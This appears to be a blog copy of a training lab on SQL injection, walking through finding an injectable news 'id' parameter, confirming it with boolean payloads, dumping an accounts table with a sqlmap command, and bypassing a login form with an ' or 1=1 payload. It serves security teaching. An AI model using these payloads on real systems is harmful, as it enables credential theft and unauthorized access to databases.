Simple sql

 

Sqlmap

SQL Injection

Report an issue

Description

In this lab you can practice the SQL Injection techniques and tools studied during the course. You can access the target web application at the following address 10.124.211.96.

Goal

The goal of this lab is to test the web application in order to find all the vulnerable injection points. Once you find them, you should be able to dump all the data and successfully log into the web application.

Tools

The best tools for this lab are:

  • Web browser

  • SQL map.

Steps

Explore the web application

Explore the Web application at the address 10.124.211.96 and find all the possible injection points.

Test and exploit the injection points

By now, you should have found few injection points. Test them with different techniques.

Dump the data

Now that you know there is at least one exploitable SQL Injections in the target Web Application, exploit it and dump all the data from the database. You should be able to retrieve some very interesting information that will allow you to log into the web app.

Login without using any credential

Test the login form against SQL injection and use the correct payload to bypass the authentication mechanism.

SOLUTIONS

Please go ahead ONLY if you have COMPLETED the lab or you are stuck! Checking the solutions before actually trying the concepts and techniques you studied in the course, will dramatically reduce the benefits of a hands-on lab!

Solutions steps

Explore the web application

In order to explore the web application we just need to type the IP address in our browser:

Now that we are able to access it, let us navigate the application in order to find all the possible injection points.

Right now, we do not know any working credential, so if we login we will get a message similar to the following:

If we keep digging the application, we can see a very interesting page at the following address: http://10.124.211.96/news.php.

Here we have a list of news and by clicking on any of the links listed, we can see a very interesting page:

As you can see in the address bar of our browser, it seems that the application accepts a parameter (id). This is probably used to retrieve the news from a database.

Let's then use this injection point for our tests!

Test and exploit the injection points

The first test we can run against the page found in the previous step is the following:

We just added a single quote in the address bar, and as shown in the screenshot above, we obtained a mysql error. It is time to get our hands dirty! Let us create few payloads in order to test if the parameter is vulnerable to SQL Injections.

We want to test it against Boolean conditions, so let us use the following payload:

10.124.211.96/newsdetails.php?id=26 and 1=1; -- -

Then let us try with the following payload (we changed the Boolean condition from 1=1 to 1=2):

10.124.211.96/newsdetails.php?id=26 and 1=2; -- -

As we can see from the previous two screenshots, we obtain two different results. When the condition is true, the application returns the news. With a false condition, the page returns no content. This means that the parameter is vulnerable to SQL Injection!

Dump the data

Now that we know a vulnerable injection point, let us use sqlmap to exploit it and retrieve all the data from the application database:

C:\Users\Litsnarf\Desktop\pts3\sqlmap.png

As we can see from the previous screenshot, sqlmap identifies the parameter as vulnerable! Now we just have to get the structure of the database and dump the data. First, let us get a list of tables, as follows:

Then dump all the data from the accounts table with the following command:

sqlmap -u http://10.124.211.96/newsdetails.php?id=1 -D awd -T accounts --dump

As we can see, we now have a list of usernames and password to use in order to log into the web application! Let us try one of these:

Great, we successfully logged into the web application!

Login without using any credential

Until now, we focused our tests against the newsdetails.php page and its parameter, but the web application has one more injection point to test: the login form!

Let us run some tests and see if we are able to bypass the login! To do this we will use the following payload:

' or 1=1; -- -

As we can see the form is vulnerable too, indeed the "Welcome!" message appears!

Comments

Post a Comment

Popular Posts